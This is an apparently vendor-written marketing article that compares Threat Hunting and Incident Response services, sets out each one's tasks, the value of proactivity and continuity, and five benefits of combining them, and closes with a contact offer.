Threat Hunting & Incident Response: Two complementary and necessary services

35 million dollars. This is the amount of losses caused by a cyber-attack on Halliburton, a multinational energy company, in August. Although the figure is shocking, the consequences of the incident could have been more serious if the victim had been a company with fewer resources and a lower level of cybersecurity maturity.

Incidents such as this one show that advanced cybersecurity services such as Threat Hunting and Incident Response are essential when it comes to detecting cyber threats, being proactive in their eradication and acting with maximum efficiency from the first second of a security incident.

1. What is Threat Hunting?

To approach the comparison between Threat Hunting and Incident Response we must understand what each of these services consists of. Threat Hunters are in charge of:

• Perform an active and continuous search for threats based on compromise hypotheses.
• Detect techniques, tactics and procedures (TTPs) of hostile actors that have not generated alerts by a company’s detection mechanisms.
• Identify new TTPs.
• Analyze telemetry available through EDR/XDR technology in order to detect if malicious activity has occurred in the context of the enterprise.
• Provide highly relevant information to the Red Team for the most realistic exercises possible.

Thus, Threat Hunting services enable companies to detect threats early and discover malicious operations, even if the technology is not capable of doing so.

2. What is Incident Response?

Incident response services have a twofold mission:

• To prepare companies to deal with a cyber-attack.
• To respond as quickly and efficiently as possible to a security incident.

To meet these objectives, Incident Response professionals must perform before a cyber-attack occurs:

• Periodic Readiness Assessment to enable them to respond to a cyber-attack in less than 1 hour.
• Ongoing Compromise Assessment to identify previously undetected malicious activity.
• Incident drills, in order to optimize how to respond to incidents.
• Threat analysis to identify hostile actors that could launch cyber-attacks against the company and implement measures to help prevent them.

What happens when a security incident is in progress? Incident Response services are responsible for the following:

• Understanding the full scope of the security incident.
• Investigating the incident and identifying the scope and impact of the compromise. This involves understanding the permissions available to hostile actors and elucidating their ability to harm the enterprise.
• Orchestrating a tailored response to the incident and successfully expelling the malicious actor from the corporate infrastructure.
• Ensure that the hostile actor cannot re-engage the enterprise.
• Analyze the incident and the response to it in order to know precisely what happened, identify the weaknesses exploited by the malicious actors and propose a series of recommendations to prevent future incidents.

Thus, the comparison between Threat Hunting and Incident Response allows us to see that they are not mutually exclusive services; on the contrary, they complement each other and contribute to improving companies’ incident detection and response capabilities.

3. The importance of proactivity and continuity in Threat Hunting and Incident Response

Beyond the differences between Threat Hunting and Incident Response that we have just listed, both services must have two common characteristics that are critical to guarantee their effectiveness:

• Proactivity. If Threat Hunting and Incident Response services are not proactive in detecting malicious activity and criminal operations, their effectiveness suffers. Conversely, a proactive Threat Hunting service can detect threats at very early stages and prevent the malicious actor from ever producing a significant incident. In the same way, if a company chooses to implement a proactive Incident Response service, it will be able to take measures to be prepared for a security incident and respond efficiently from the very first moment, thus minimizing any impact.
• Continuity. Some companies do not have Threat Hunting and Incident Response services that work on a continuous basis but opt for:
  • Campaign-based Threat Hunting with limited frequency, scope and adaptability.
  • A reactive Incident Response, i.e., one that only starts working when an incident is detected and does not make any prior preparation, which reduces the ability to respond quickly and effectively. Only through continuous Threat Hunting and Incident Response services can threat detection and incident response be optimized to the maximum.

4. Threat Hunting & Incident Response: Who should respond to a detected threat?

Given what we have just said, it is clear that rather than talking about Threat Hunting or Incident Response, we should point out the importance of both services being provided collaboratively. Why?

• The knowledge and experience of Threat Hunters is essential when performing key tasks of proactive Incident Response, focusing on preparedness and prevention:
  • Compromise Assessment.
  • Threat Analysis.
• As we have already mentioned, Threat Hunters are capable of analyzing the information provided by telemetry and detecting threats at very early stages. This results in the ability to resolve an incident in a short time and ensure that its impact on the operation of a company is very limited.
• There is a debate among cybersecurity professionals themselves as to who should be in charge:
  • The response to a threat detected by Threat Hunters.
  • Identifying the scope of a compromise.
  • Designing containment and remediation strategies and plans.

That this doubt exists is evidence that the collaboration between Threat Hunting and Incident Response teams should be as close as possible to optimize the way they operate and increase a company’s detection and response capacity.

5. Five benefits of implementing Threat Hunting and Incident Response

The comparison between Threat Hunting and Incident Response helps us to see five major benefits that are very attractive for companies that implement both services:

1. Earlier threat detection and effective threat neutralization, even before a significant incident occurs.
2. Increased coverage of malicious tactics, techniques and procedures and continuous research into new TTPs.
3. Increased ability to contain the impact and reduce the duration of a security incident.
4. Protect business continuity in the event of an incident and minimize damage to customers, suppliers or employees.
5. Reduce the economic impact of a successful cyber-attack. Thanks to Threat Hunting and Incident Response services, the effect of a cyber-attack on a company’s operations can be mitigated, and it is not necessary to invest a large amount of resources to manage an incident from scratch.

If you would like more information on how to prepare your company for security threats, please contact us and we will advise you without obligation.